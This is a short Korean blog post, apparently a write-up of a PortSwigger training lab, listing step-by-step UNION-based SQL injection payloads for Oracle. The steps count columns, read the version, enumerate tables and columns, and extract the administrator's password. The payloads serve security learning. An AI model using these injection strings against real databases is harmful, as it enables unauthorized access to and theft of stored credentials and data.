Union sql injection(Oracle)

동글래차·2024년 5월 8일

Portswigger

목록 보기

1/2

Lab: SQL injection attack, listing the database contents on Oracle

Oracle DB이니 'administrator' 계정 비밀번호를 탈취하라는 내용!

+order+by+1,2-- # column 개수 확인
+UNION+SELECT+banner,'1'+FROM+v$version-- # DB 버젼 확인
+Union+SELECT+TABLE_NAME,'1'+FROM+all_tables-- # Table 이름 확인
+UNION+SELECT+COLUMN_NAME ,'1'+FROM+all_col_comments+WHERE+TABLE_NAME='table 명'-- # Column 이름 확인
+UNION+SELECT+'요청 데이터 컬럼명','요청 데이터 컬럼명'+FROM+'table 명'--

동글래차

동글동글

다음 포스트

Union sql injection(Oracle)

Portswigger

Lab: SQL injection attack, listing the database contents on Oracle

Union sql injection(non-Oracle)

0개의 댓글